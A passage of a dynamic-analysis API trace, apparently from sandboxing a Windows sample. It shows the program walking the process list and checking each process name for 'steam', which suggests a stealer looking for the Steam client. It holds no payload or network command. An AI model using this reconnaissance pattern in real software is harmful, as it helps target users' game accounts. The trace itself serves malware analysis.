szExeFile="SecurityHealthService.exe")) returned 1 [0099.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0099.205] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bc80 [0099.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356bc80, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0099.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0099.205] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="steam") returned 0x0 [0099.205] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0099.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.208] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a658 [0099.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357a658, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0099.208] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0099.208] StrStrIA (lpFirst="Memory Compression", lpSrch="steam") returned 0x0 [0099.208] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0099.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.209] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357a4f8 [0099.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357a4f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0099.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0099.209] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="steam") returned 0x0 [0099.209] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0099.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.210] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b808 [0099.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x357b808, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0099.211] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0099.211] StrStrIA (lpFirst="SearchUI.exe", lpSrch="steam") returned 0x0 [0099.211] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0099.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.212] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a558 [0099.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357a558, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0099.212] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0099.212] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="steam") returned 0x0 [0099.212] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.213] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b820 [0099.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357b820, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0099.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0099.213] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="steam") returned 0x0 [0099.213] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0099.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.215] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b760 [0099.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x357b760, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0099.215] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0099.215] StrStrIA (lpFirst="pending.exe", lpSrch="steam") returned 0x0 [0099.215] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0099.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.216] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bbe0 [0099.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356bbe0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0099.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0099.216] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="steam") returned 0x0 [0099.217] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0099.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.218] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a7d8 [0099.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357a7d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0099.218] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0099.218] StrStrIA (lpFirst="swing prefer.exe", lpSrch="steam") returned 0x0 [0099.218] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0099.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0099.219] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356ba78 [0099.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356ba78, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0099.219] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0099.219] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="steam") returned 0x0 [0099.219] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0099.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.222] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a7f8 [0099.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357a7f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0099.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0099.223] StrStrIA (lpFirst="nights-attending.exe", lpSrch="steam") returned 0x0 [0099.223] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0099.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.224] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b6b8 [0099.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x357b6b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0099.224] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0099.224] StrStrIA (lpFirst="installed.exe", lpSrch="steam") returned 0x0 [0099.225] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0099.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.226] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356ba00 [0099.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356ba00, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0099.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0099.226] StrStrIA (lpFirst="references compounds.exe", lpSrch="steam") returned 0x0 [0099.226] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0099.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.227] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a5d8 [0099.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357a5d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0099.227] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0099.227] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="steam") returned 0x0 [0099.227] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0099.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.229] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a498 [0099.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357a498, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0099.229] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0099.229] StrStrIA (lpFirst="registered try.exe", lpSrch="steam") returned 0x0 [0099.229] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0099.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.230] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b8e8 [0099.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b8e8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0099.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0099.230] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="steam") returned 0x0 [0099.230] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0099.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.232] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b8f8 [0099.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x357b8f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0099.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0099.232] StrStrIA (lpFirst="invite.exe", lpSrch="steam") returned 0x0 [0099.232] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0099.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.233] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357b880 [0099.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x357b880, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0099.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0099.233] StrStrIA (lpFirst="idol.exe", lpSrch="steam") returned 0x0 [0099.233] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0099.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.234] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356bd20 [0099.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356bd20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0099.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0099.235] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="steam") returned 0x0 [0099.235] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0099.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.236] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bb18 [0099.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356bb18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0099.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0099.236] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="steam") returned 0x0 [0099.236] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0099.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.261] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357b718 [0099.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x357b718, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0099.261] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0099.262] StrStrIA (lpFirst="powell_jane.exe", lpSrch="steam") returned 0x0 [0099.262] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0099.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.263] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a878 [0099.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357a878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0099.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0099.263] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="steam") returned 0x0 [0099.263] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0099.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.264] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357b7a8 [0099.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x357b7a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0099.264] 